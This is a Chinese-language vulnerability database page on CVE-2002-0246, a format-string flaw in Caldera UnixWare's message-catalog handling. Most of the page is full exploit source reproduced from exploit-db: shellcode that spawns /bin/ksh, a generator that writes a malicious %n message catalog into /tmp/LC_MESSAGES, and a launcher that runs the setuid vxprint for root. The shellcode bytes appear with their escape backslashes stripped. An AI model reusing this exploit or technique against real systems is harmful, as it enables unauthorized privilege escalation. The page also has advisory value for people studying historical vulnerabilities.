Caldera UnixWare 信息目录环境变量格式化字符串漏洞-安全小百科

Caldera UnixWare 信息目录环境变量格式化字符串漏洞

漏洞ID	1106604	漏洞类型	格式化字符串
发布时间	2002-02-07	更新时间	2005-05-02
CVE编号	CVE-2002-0246	CNNVD-ID	CNNVD-200205-099
漏洞平台	UnixWare	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/21284
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-099

|漏洞详情

UnixWare7.1.1的信息目录库函数存在格式化字符串漏洞。本地用户可以通过修改LC_MESSAGE环境变量，读取其他setuid程序如vxprint中包含格式化字符串的信息目录，从而获取权限。

|漏洞EXP

source: http://www.securityfocus.com/bid/4060/info

UnixWare is a commercially available Unix Operating System. It was originally developed by SCO, and is now distributed and maintained by Caldera.

A format string vulnerability in the locale subsystem could lead to a user gaining elevated privileges. A local user could potentially supply maliciously crafted message catalogs through the LC_MESSAGES environment variable. This could allow a local user to load arbitrary message catalogs into setuid or setgid programs, and execute arbitrary code with setuid/setgid privileges. 

--------------------------expshell.c-----------------------------

#include <stdio.h>

char shellcode[]=
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90"
    "xebx1a"             /* jmp     <shellcode+28>         */
    "x33xd2"             /* xorl    %edx,%edx              */
    "x58"                 /* popl    %eax                   */
    "x8dx78x14"         /* leal    0x14(%eax),%edi        */
    "x57"                 /* pushl   %edi                   */
    "x50"                 /* pushl   %eax                   */
    "xab"                 /* stosl   %eax,%es:(%edi)        */
    "x92"                 /* xchgl   %eax,%edx              */
    "xab"                 /* stosl   %eax,%es:(%edi)        */
    "x88x42x08"         /* movb    %al,0x8(%edx)
*/
    "x83xefx3b"         /* subl    $0x3b,%edi             */
    "xb0x9a"             /* movb    $0x9a,%al              */
    "xab"                 /* stosl   %eax,%es:(%edi)        */
    "x47"                 /* incl    %edi                   */
    "xb0x07"             /* movb    $0x07,%al              */
    "xab"                 /* stosl   %eax,%es:(%edi)        */
    "xb0x0b"             /* movb    $0x0b,%al              */
    "xe8xe1xffxffxff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

main(int argc, char *argv[])
{
   char buff[1024];

   sprintf(buff, "EGG=%s", shellcode);
   putenv(buff);

   putenv("LC_MESSAGES=/tmp");
   system("/usr/bin/tcsh");
}

-----------------------------------fmt_exp.c--------------------------------

#include <stdio.h>
#include "shellcode.h"

/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268

main(int argc, char *argv[])
{
   FILE *fp;
   char *retaddr;
   long g_len, offset;
   int count, count2, line=700, n=19;

   if(argc < 2 || argc > 3) {
      printf("Usage: %s ret-address offsetn", argv[0]);
      exit(1);
   }

   retaddr = argv[1];
   if(argc == 3) offset = atol(argv[2]);
   else offset = 0;

   g_len = strtol(retaddr, NULL, 16);
   g_len -= BASE;
   g_len += offset;
   fp = fopen("testdef", "w+");
   if(fp == NULL) {
      fprintf(stderr, "can not open file.n"); exit(1);
   }
   for(count=0; count<line; count++) {
      for(count2=0; count2<n; count2++)
         fprintf(fp, "%%10x");
      fprintf(fp, "%%%dx%%nn", g_len);
   }
   fclose(fp);

   remove("testout");
   system("mkmsgs testdef testout");
   mkdir("/tmp/LC_MESSAGES", 0755);
   system("mv
testout /tmp/LC_MESSAGES/vxvm.mesg");

   printf("ret addr = 0x%xn", g_len);
   /* this, also can any set uid command */
   execl("/usr/sbin/vxprint", "vxprint", "---", NULL);
}

-------------------------------------getret.c--------------------------------------

main()
 {
 char *a;
 a = getenv("EGG");
 printf ("e=%pn", a);
 }

|参考资料

来源:XF
名称:unixware-msg-catalog-format-string(8113)
链接:http://www.iss.net/security_center/static/8113.php
来源:CALDERA
名称:CSSA-2002-SCO.3
链接:ftp://stage.caldera.com/pub/security/unixware/CSSA-2002-SCO.3/CSSA-2002-SCO.3.txt
来源:BUGTRAQ
名称:20020210UnixwareMessagecatalogexploitcode
链接:http://online.securityfocus.com/archive/1/255414
来源:BID
名称:4060
链接:http://www.securityfocus.com/bid/4060

相关推荐: myServer 0.4.x – ‘cgi-lib.dll’ Remote Buffer Overflow (PoC)

myServer 0.4.x – ‘cgi-lib.dll’ Remote Buffer Overflow (PoC) 漏洞ID 1054163 漏洞类型发布时间 2003-09-12 更新时间 2003-09-12 CVE编号 N/A CNNVD-ID N…

文章版权归作者所有，未经允许请勿转载。

THE END